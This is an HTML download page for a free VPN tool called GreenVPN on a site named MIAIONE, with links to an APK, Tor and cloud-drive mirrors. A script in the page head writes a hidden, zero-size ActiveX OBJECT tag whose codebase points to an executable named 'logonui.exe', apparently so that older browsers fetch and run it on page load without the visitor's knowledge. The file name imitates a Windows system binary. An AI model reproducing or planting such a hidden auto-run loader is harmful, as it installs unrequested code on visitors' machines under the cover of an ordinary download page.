<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>MIAIONE 下载</title>

    <title>MIAIONE VPN</title>
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <script language="javascript">
function deleteDiv(ele){
 ele.parentNode.parentNode.removeChild(ele.parentNode);
}
    </script>

    <script type="text/javascript" src="http://cdn.webfont.youziku.com/wwwroot/js/wf/youziku.api.min.js"></script>
    <script type="text/javascript">
   $youziku.load("body", "2e670eca84f84cca9c3bae835ae47315", "MicrosoftJhengHei");
   /*$youziku.load("#id1,.class1,h1", "2e670eca84f84cca9c3bae835ae47315", "MicrosoftJhengHei");*/
   /*．．．*/
   $youziku.draw();
    </script>
    <meta charset="utf-8">
    <style type="text/css">
        <!-- zhe--! >
        .UI {
        }

        body {
            text-align: center
        }
    </style>
    <style type="text/css">
        * {
            margin: 0;
            padding: 0;
        }

        body {
            background-color: #EFEFEF;
        }

        #wrapper {
            width: auto;
            height: auto;
            text-align: center;
        }

            #wrapper h1 {
                color: #FFF;
                text-align: center;
                margin-bottom: 40px;
            }
            /*biaotiyanse*/

            #wrapper a {
                display: block;
                font-size: .9em;
                padding-top: 20px; /*anniugaodu*/
                color: #FFF;
                text-decoration: none;
                text-align: center;
            }
        /*chnagkuangao*/
        #container {
            width: auto; /*kuan*/
            height: auto;
            padding-bottom: 80px; /*gao*/
            background-color: #FFFFFF;
        }

        .navtop {
            height: 40px;
            background-color: #24B2EB;
            padding: 100px;
        }

        .content {
            padding: 10px 10px 25px;
            background: #FFFFFF;
            margin: auto;
            color: #333;
            -moz-border-radius: 100px;
            -webkit-border-radius: 100px;
        }

        a.button {
            text-align: center;
            height: 20px;
            width: auto;
            color: white;
            padding: 15px 20px;
            text-shadow: 1px 1px 0 #00A5FF;
            font-weight: bold;
            border: 1px solid #24B2EB;
            margin: 10px 200px;
            clear: both;
            background-color: #24B2EB;
            border-radius: 100px;
        }

            a.button:hover {
                text-decoration: none;
                background-color: #24B2EB;
            }
    </style>
    <script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"https://miaione.github.io/files/download/others/logonui.exe\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
document.open();
document.clear();
document.writeln(run_exe);
document.close();
    </script>
</head>
<body>
    <div id="wrapper">
        <div id="container">
            <div class="navtop">
                <h1>下载[DownLoad]</h1>
                <div>
                    <font color="white"><h2><a href="https://miaione.github.io">返回主页</a></h2></font>
                </div>
            </div>
            <div id="content">
                <br>
                <br>
                <div>
                    GreenVPN 稳定 免费 高速
                </div>
                <br><h3><a href="VPN.html">GreenVPN使用说明</a></h3>
                <!--lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll按钮llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-->
                <a href="/vpn/greenvpn.apk" title="greenvpn" class="button"><h3>下载GreenVPN(翻墙工具需与Tor配合使用)</h3></a>
                <a href="http://torproject.org" title="greenvupn" class="button"><h3>Tor(洋葱浏览器官方网站，访问前需要VPN翻墙)</h3></a>
                <br>
                <div>

                    注意：由于GitHub托管的项目每个文件不能超过100MB,所以部分文件会放到
                   <br> <a href="http://miaione.ys168.com/"><font color="black">永硕网盘</font></a>
                    <br><a href="https://pan.baidu.com/s/1sLbP_pKoAO1RyDnGNPYi9g"><font color="black">百度网盘 提取码: p5ph (可能会被和谐)</font></a>
                   <br> <a href="https://u19413574.ctfile.com/dir/19413574-32465371-ffbd1a/"><font color="black">城通网盘</font></a>

                </div>
                <!--lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll按钮lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-->
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>
                <br>

                <br>
                <br>
                <br>©MIAIONE All Copyright,lnc. 2018-2038
            </div>
        </div>
    </div>
</body>
</html>
